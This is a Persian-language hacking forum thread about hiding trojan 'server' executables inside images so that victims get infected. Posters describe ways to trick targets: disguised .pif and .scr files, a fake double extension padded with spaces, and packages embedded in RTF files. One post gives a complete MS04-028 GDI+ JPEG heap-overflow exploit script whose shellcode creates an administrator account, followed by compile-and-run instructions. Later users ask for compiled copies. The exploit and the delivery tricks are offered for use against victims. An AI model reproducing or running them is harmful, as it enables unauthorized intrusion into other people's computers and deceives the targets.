امتیاز موضوع:
  • 0 رأی - میانگین امتیازات: 0
  • 1
  • 2
  • 3
  • 4
  • 5
چسباندن يك فايل اجرائي به عكس
نویسنده پیام
shahram_g آفلاین
كاربر تک ستاره
*

ارسال‌ها: 47
موضوع‌ها: 16
تاریخ عضویت: آبان ۱۳۸۶

تشکرها : 6
( 8 تشکر در 7 ارسال )
ارسال: #12
RE: چسباندن يك فايل اجرائي به عكس
koroshbozorg نوشته است:چسبادن فایل عکس برای نمونه به یک فایل اجرایی شدنی هست. ولی مشکل اینجاست که پسوند تغییر نمی کنه. پسوند jpg نیست و در واقع همون exe هست. راهی که بتونه این پسوند رو به دلخواه عوض کنه و کارایی فایل سرور هم از دست نره در نظر هست.

مرسي دقيقا منظور من همينه.نمي دونم راهي هست يا نه؟
۱۹-فروردین-۱۳۸۷, ۱۶:۲۸:۳۹
ارسال‌ها
پاسخ
Di Di آفلاین
مدير بخش هك و كرك
*****

ارسال‌ها: 2,358
موضوع‌ها: 116
تاریخ عضویت: اسفند ۱۳۸۵

تشکرها : 1816
( 4046 تشکر در 1321 ارسال )
ارسال: #13
RE: چسباندن يك فايل اجرائي به عكس
مي تونيد از مهندسي اجتماعي استفاده كنيد.

من دوستي داشتم كه براي ارسال سرور ياكوزا از روش مهندسي اجتماعي به بهترين نحو ممكن استفاده مي كرد. اون فايل سرور رو با پسوند Pif روي وب قرار مي داد و لينك اون رو با عنوان پي دي اف آموزشي يا ... براي قرباني ارسال مي كرد.
يا در مواردي اون رو با پسوند SCR به عنوان اسكرين سيور ويژه ولنتاين جا مي زد. به اين ترتيب قرباني به سادگي فريب مي خورد .


يكي از روش هايي كه چند وقت پيش غوغا كرده بود تغيير نام فايل به Server.Jpg. { 50 Space }.EXE و ارسال اون براي قرباني بود. با اين روش پسوند فايل به نظر چيز ديگري مي آمد اما امروزه ديگر نمي توان به سادگي از اين روش استفاده كرد.

يه روش ديگه براي پنهان كردن سرور ، قرار دادن اون در فايل هاي Rtf يا همون فايلهاي WordPad‌ويندوز هست. براي اين كار كافيه وردپد ويندوز رو اجرا كنيد و فايل خودتون روداخلش درگ كنيد. ملاحظه مي كنيد كه فايل سرور به صورت پكيجي داخل اون قرار مي گيره كه با كليك بر روي اون سرور اجرا خواهد شد. شما حتي مي تونيد اسم و آيكون پكيج رو هم تغيير بديد.

راه ديگه اي كه مي شه از اون استفاده كرد ساخت فايل Scrap هست. فايل هاي اسكراپ در ويندوز بدون پسوند نمايش داده مي شوند و مي تونن گزينه مناسبي براي حمل سرور باشن چون بالاخره پسوند نداشتن بهتر از پسوند اجرايي داشتنه (‌البته اشتباه نشه پسوند دارن ولي نمايش داده نمي شه )
براي ساخت اسكراپ بايد همون كارهاي قبل رو انجام بديد ولي در نهايت بايد پكيج رو كژي كنيد و داخل فولدر ذخيره كنيد.

همه اين راه ها رو گفتم اما خداوكيليش اين رفيق ما دو كلاس سواد برنامه نويسي هم نداره ولي با مهندسي اجتماعي اونقدر راحت به سيستم ها نفوذ مي كنه كه آدم حسوديش مي شه!! Tongue Wink

۱۹-فروردین-۱۳۸۷, ۱۷:۰۶:۴۴
وب سایت ارسال‌ها
پاسخ
تشکر شده توسط : lord_viper
Payman62 آفلاین
مدیر بخش ویژوال بیسیک
*****

ارسال‌ها: 2,273
موضوع‌ها: 149
تاریخ عضویت: اسفند ۱۳۸۴

تشکرها : 1308
( 3661 تشکر در 942 ارسال )
ارسال: #14
RE: چسباندن يك فايل اجرائي به عكس
lord_viper نوشته است:
shahram_g نوشته است:
sima_6600 نوشته است:نميشه فايل اجراي رو به عكس چسباند ولي ميتوان عكس را به فايل اجراي چسباند.مثل Binder ها ولي اگر شما مي خواهيد فايل با پسوند Jpg باشد مي توانيد از باگ قديمي اين پسوند استفاده كنيد و يه فايل رو توي سايتي Upload كني و آدرسش رو داخل اون بدي و فايل رو بسازي و براي طرف بفرستي.ولي اين كار به طور مستقيم ويروس را وارد كامپيوتر طرف نميكنه و بايد طرف به اينترنت وصل باشه.

ببخشيد ميشه بيشتر توضيح بدي؟
ممنون
این مربوط میشه به بخش هک
تو فایل با فورمت jpg یه باگ هست که هکر با استفاده از اون میتونه یه کد مخرب رونفایل jpg قرار بده و اون عکس رو بده به شما وقتی شما اون عکس رو باز میکنین کد مورد نظر که هر چیزی میتونه باشه (از باز کردن یک پورت روی سیستم تا ایجاد یک اکانت کاربری یا دسترسی ادمین)روی سیستم شما ایجاد میکنه تا هکر بتونه به سیستم شما نفوظ کنه

سلام.
میشه در مورد روش استفاده از این باگ توضیح بدی؟ اصلا هنوز این باگ موجود هست ؟ یا پچش اومده؟
۲۴-فروردین-۱۳۸۷, ۲۲:۱۱:۰۶
ارسال‌ها
پاسخ
lord_viper غایب
مدیر کل انجمن
*****

ارسال‌ها: 3,949
موضوع‌ها: 352
تاریخ عضویت: بهمن ۱۳۸۴

تشکرها : 5193
( 9875 تشکر در 2650 ارسال )
ارسال: #15
RE: چسباندن يك فايل اجرائي به عكس
سلام پیمان جان
اين كسپلويت به هکر اجازه می ده کدهای مخرب خود را درون فایل های JPEG که همان فرمت عکس هست قرار بده و برای قربانی های خود ارسال کنند. به محض باز کردن فایل JPEG فرستاده شده از سوی هکر، در سیستم قربانی کد مخربی اجرا می شه که بسته به معلومات هکر می تونه پورتی را بر روی سیستم قربانی باز کرده و Shell سیستم قربانی را به هکر بده و یا Account ای با سطح اختیارات Admin در آن سیستم بسازه و یا باعث Crash کردن یک سیستم بشه و کارهای دیگر.
اين اكسپلويت چند تا ورژن داره اين يكي فكر مي كنم يه يوزر در سطح ادمين ميده
کد:
// CAN-2004-0200

#!/bin/sh
#
# MS04-028 Exploit PoC II with Shellcode: CreateUser X in Administrators Group
#
# Tested on:
# WinXP Professional English SP1 - GDIPLUS.DLL version 5.1.3097.0
# WinXP Professional Italian SP1 - GDIPLUS.DLL version 5.1.3101.0
# (SP2 is not vulnerable, don't waste your time trying this exploit on it!)
#
# Usage:
#    first,  replace the "\xCC" = INT3 instruction at beginning of shellcode
#    second, choose a right ret address for GDI+ DLL and WinXP version
#    then,  create crafted JPEG with: sh ms04-028.sh > img.jpg
#
# Created by:
#    Elia Florio
#    (heap overflow study purpose, not for lamerz, not for script-kiddie)
#
# Thanx to:
# jerome.athias
# metasploit.org
# idefense
# full-disclosure list

#********************************************
#Standard JPEG header
#********************************************
printf "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64\x00\x60\x00\x00"
printf "\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00\x04\x00\x00\x00\x0A\x00\x00"
printf "\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65\x00\x64\xC0\x00\x00\x00\x01"

#********************************************
#Heap Overflow Trigger DWORD - 00 length field (01 works too)
#********************************************
printf "\xFF\xFE\x00\x01"


#********************************************
#Additional stuff to complete the header
#********************************************
printf  "\x00\x14\x10\x10\x19\x12\x19\x27\x17\x17\x27\x32"


#********************************************
#Sugg. by jerome.athias
# 1) Opening directly in IE
#Address to overwrite = RtlEnterCriticalSelection() - 4
#Check page 172 of SC Handbook for those of you playing along at home
#********************************************
printf "\xEB\x0F\x26\x32" #control ECX register


#********************************************
#Address of shellcode
#********************************************
printf "\x42\x42\x42\x42" #control EDX, left these values if u wanna raise an exception and debug in GDI+
#printf "\xDC\xB1\xE7\x70" #70E7B1DC WinXP Professional English SP1 -GDIPLUS.DLL version 5.1.3097.0
#printf "\xDC\xB1\x30\x78" #7830B1DC WinXP Professional Italian SP1 -GDIPLUS.DLL version 5.1.3101.0


#********************************************
#end_of_jpeg_header
#********************************************
printf "\x26\x2E\x3E\x35\x35\x35\x35\x35\x3E"
#NOP1
printf "\xE8\x00\x00\x00\x00\x5B\x8D\x8B"
printf "\x00\x05\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8"

#********************************************
#Image junk here...fake JPG
#********************************************
printf
"\x00\x00\x00\xFF\xDB\x00\x43\x00\x08\x06\x06\x07\x06\x05\x08\x07\x07";
printf
"\x07\x09\x09\x08\x0A\x0C\x14\x0D\x0C\x0B\x0B\x0C\x19\x12\x13\x0F\x14";
printf
"\x1D\x1A\x1F\x1E\x1D\x1A\x1C\x1C\x20\x24\x2E\x27\x20\x22\x2C\x23\x1C";
printf
"\x1C\x28\x37\x29\x2C\x30\x31\x34\x34\x34\x1F\x27\x39\x3D\x38\x32\x3C";
printf
"\x2E\x33\x34\x32\xFF\xDB\x00\x43\x01\x09\x09\x09\x0C\x0B\x0C\x18\x0D";
printf
"\x0D\x18\x32\x21\x1C\x21\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf
"\x32\x32\x32\x32\x32\xFF\xC0\x00\x11\x08\x00\x03\x00\x03\x03\x01\x22";
printf
"\x00\x02\x11\x01\x03\x11\x01\xFF\xC4\x00\x1F\x00\x00\x01\x05\x01\x01";
printf
"\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05";
printf
"\x06\x07\x08\x09\x0A\x0B\xFF\xC4\x00\xB5\x10\x00\x02\x01\x03\x03\x02";
printf
"\x04\x03\x05\x05\x04\x04\x00\x00\x01\x7D\x01\x02\x03\x00\x04\x11\x05";
printf
"\x12\x21\x31\x41\x06\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91\xA1\x08";
printf
"\x23\x42\xB1\xC1\x15\x52\xD1\xF0\x24\x33\x62\x72\x82\x09\x0A\x16\x17";
printf
"\x18\x19\x1A\x25\x26\x27\x28\x29\x2A\x34\x35\x36\x37\x38\x39\x3A\x43";
printf
"\x44\x45\x46\x47\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64";
printf
"\x65\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x83\x84\x85";
printf
"\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4";
printf
"\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2\xC3";
printf
"\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE1";
printf
"\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8";
printf
"\xF9\xFA\xFF\xC4\x00\x1F\x01\x00\x03\x01\x01\x01\x01\x01\x01\x01\x01";
printf
"\x01\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A";
printf
"\x0B\xFF\xC4\x00\xB5\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07\x05\x04";
printf
"\x04\x00\x01\x02\x77\x00\x01\x02\x03\x11\x04\x05\x21\x31\x06\x12\x41";
printf
"\x51\x07\x61\x71\x13\x22\x32\x81\x08\x14\x42\x91\xA1\xB1\xC1\x09\x23";
printf
"\x33\x52\xF0\x15\x62\x72\xD1\x0A\x16\x24\x34\xE1\x25\xF1\x17\x18\x19";
printf
"\x1A\x26\x27\x28\x29\x2A\x35\x36\x37\x38\x39\x3A\x43\x44\x45\x46\x47";
printf
"\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64\x65\x66\x67\x68";
printf
"\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x82\x83\x84\x85\x86\x87\x88";
printf
"\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4\xA5\xA6\xA7";
printf
"\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2\xC3\xC4\xC5\xC6";
printf
"\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE2\xE3\xE4\xE5";
printf
"\xE6\xE7\xE8\xE9\xEA\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFF\xDA\x00";
printf
"\x0C\x03\x01\x00\x02\x11\x03\x11\x00\x3F\x00\xF9\xFE\x8A\x28\xA0\x0F";

#********************************************
#"A" buffer
#********************************************
perl -e 'print "\x41"x1601'; #buffer 1601 x NOP

#********************************************
#SHELLCODE AREA
#place shellcode here...
#don't use any "FFD9" bytes, cause it is the marker for end of jpeg image
#********************************************
printf "\xCC\x90\x90\x90"; #replace "CC=INT3" byte with NOP to make it
works!

#********************************************
#shellcode: CreateUserX as Administrator (provided by Metasploit, thanx for
your Framework, is great!)
#********************************************
printf "\x66\x81\xec\x80\x00\x89\xe6\xe8\xb7\x00\x00\x00\x89\x06\x89\xc3"
printf "\x53\x68\x7e\xd8\xe2\x73\xe8\xbd\x00\x00\x00\x89\x46\x0c\x53\x68"
printf "\x8e\x4e\x0e\xec\xe8\xaf\x00\x00\x00\x89\x46\x08\x31\xdb\x53\x68"
printf "\x70\x69\x33\x32\x68\x6e\x65\x74\x61\x54\xff\xd0\x89\x46\x04\x89"
printf "\xc3\x53\x68\x5e\xdf\x7c\xcd\xe8\x8c\x00\x00\x00\x89\x46\x10\x53"
printf "\x68\xd7\x3d\x0c\xc3\xe8\x7e\x00\x00\x00\x89\x46\x14\x31\xc0\x31"
printf "\xdb\x43\x50\x68\x72\x00\x73\x00\x68\x74\x00\x6f\x00\x68\x72\x00"
printf "\x61\x00\x68\x73\x00\x74\x00\x68\x6e\x00\x69\x00\x68\x6d\x00\x69"
printf "\x00\x68\x41\x00\x64\x00\x89\x66\x1c\x50\x68\x58\x00\x00\x00\x89"
printf "\xe1\x89\x4e\x18\x68\x00\x00\x5c\x00\x50\x53\x50\x50\x53\x50\x51"
printf "\x51\x89\xe1\x50\x54\x51\x53\x50\xff\x56\x10\x8b\x4e\x18\x49\x49"
printf "\x51\x89\xe1\x6a\x01\x51\x6a\x03\xff\x76\x1c\x6a\x00\xff\x56\x14"
printf "\xff\x56\x0c\x56\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"
printf "\xad\x8b\x40\x08\x5e\xc2\x04\x00\x53\x55\x56\x57\x8b\x6c\x24\x18"
printf "\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01"
printf "\xeb\xe3\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38"
printf "\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1"
printf "\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04"
printf "\x8b\x01\xe8\xeb\x02\x31\xc0\x89\xea\x5f\x5e\x5d\x5b\xc2\x08\x00";

#********************************************
#end_of_jpeg
#********************************************
printf "\xFF\xD9";
۲۵-فروردین-۱۳۸۷, ۱۸:۱۱:۵۲
وب سایت ارسال‌ها
پاسخ
تشکر شده توسط : Di Di, shahram_g, Payman62
Payman62 آفلاین
مدیر بخش ویژوال بیسیک
*****

ارسال‌ها: 2,273
موضوع‌ها: 149
تاریخ عضویت: اسفند ۱۳۸۴

تشکرها : 1308
( 3661 تشکر در 942 ارسال )
ارسال: #16
RE: چسباندن يك فايل اجرائي به عكس
سلام.
ممنونم ازت. میشه روش کامپایل این اکسپلویت و قرار دادن اون تو یه عکس رو هم توضیح بدی. تو گوگل سرچ کردم چیزی پیدا نکردم.
۲۶-فروردین-۱۳۸۷, ۱۶:۴۶:۱۱
ارسال‌ها
پاسخ
Payman62 آفلاین
مدیر بخش ویژوال بیسیک
*****

ارسال‌ها: 2,273
موضوع‌ها: 149
تاریخ عضویت: اسفند ۱۳۸۴

تشکرها : 1308
( 3661 تشکر در 942 ارسال )
ارسال: #17
RE: چسباندن يك فايل اجرائي به عكس
سلام.
چی شد پس؟
۱۴-اردیبهشت-۱۳۸۷, ۲۱:۰۷:۳۹
ارسال‌ها
پاسخ
lord_viper غایب
مدیر کل انجمن
*****

ارسال‌ها: 3,949
موضوع‌ها: 352
تاریخ عضویت: بهمن ۱۳۸۴

تشکرها : 5193
( 9875 تشکر در 2650 ارسال )
ارسال: #18
RE: چسباندن يك فايل اجرائي به عكس
سلام پیمان جان شرمنده تاپیکو گم کرده بودم الانم vbgod ادرس داد
این اکسپلوییت یه کم قدیمی شده انتی ها هم بهش گیر میده
برای کامپایل کردن اکسپلویت های C در ویندوز می تونید از ++Visual C و Lccwin و ++Borland C استفاده کنید (برنامه پيشنهادي من)
بعد از كامپايل اكسپلويت بايد اونو اجرا کنيد . و شما نمی تونيد اونو با کليک کردن اجرا کنيد چون باز نميشه برای اينکار بايد اکسپلويت کامپايل شده را در دايرکتوری ويندوزتون در يك پوشه اي کپی کنيد . و بعد به منوی استار رفته و روی گزينه Run کليک کنيد و سپس تايپ کنيد : cmd حالا command prompt باز شده حالا بايد اسم اکسپيويتتون رو تايپ کنيداکسپلويت هم نحوه کار رو داخل همون داس ويندوز توضيح می ده که اگه يه کم زبان بلد باشين می فهميد
۱۴-خرداد-۱۳۸۷, ۱۹:۵۶:۴۲
وب سایت ارسال‌ها
پاسخ
تشکر شده توسط : godvb
godvb غایب
مدیر بازنشسته بخش نفوذ و امنیت
*****

ارسال‌ها: 430
موضوع‌ها: 77
تاریخ عضویت: اسفند ۱۳۸۶

تشکرها : 886
( 1338 تشکر در 343 ارسال )
ارسال: #19
RE: چسباندن يك فايل اجرائي به عكس
سلام .
اگه كسي كامپايلش كرد بذاره ما هم دانلود كنيم .واسه ور‍‍ژن جديداش بايد چيكار كنيم ؟

آنچه توانسته ایم انجام دهیم، لطف پرودگار بوده است.

XMen For Ever
۱۴-خرداد-۱۳۸۷, ۲۰:۰۸:۵۹
ارسال‌ها
پاسخ


موضوعات مرتبط با این موضوع...
موضوع نویسنده پاسخ بازدید آخرین ارسال
  كمك براي unpack كردن فايل exe peymantrojan 4 7,719 ۲۶-تير-۱۳۸۶, ۲۱:۳۱:۳۵
آخرین ارسال: d3pr2
  اميرجان تبريك! اين فايل رو برام كرك مي‌كني؟ gostaresh 8 6,785 ۲۲-بهمن-۱۳۸۳, ۱۹:۴۸:۳۵
آخرین ارسال: akak
  مشكلاتي در مورد هك كردن يك فايل بينننن gostaresh 4 5,278 ۲۴-دى-۱۳۸۳, ۱۶:۰۰:۱۷
آخرین ارسال: ashkan
  ميشه كاري كرد كه باينري كد يك فايل brucelee 7 6,026 ۱۲-دى-۱۳۸۳, ۰۴:۲۰:۱۲
آخرین ارسال: Kouros
  يه برنامه مي خوام از يه فايل متن اونو كپي كنه تو برنا مه من Kouros 1 2,338 ۰۲-آذر-۱۳۸۳, ۱۴:۴۴:۰۷
آخرین ارسال: ashkan
  نباز فوري به يك كركر براي يك فايل بين gostaresh 5 3,656 ۱۱-مرداد-۱۳۸۳, ۱۶:۳۶:۲۴
آخرین ارسال: kamran11958
  چه جوري فايل zip پسورددار رو كرك كنم؟؟ hamidrezamf 3 3,393 ۰۹-مرداد-۱۳۸۳, ۱۱:۴۶:۱۹
آخرین ارسال: hamidrezamf

پرش به انجمن:


کاربرانِ درحال بازدید از این موضوع: 2 مهمان

صفحه‌ی تماس | IranVig | بازگشت به بالا | | بایگانی | پیوند سایتی RSS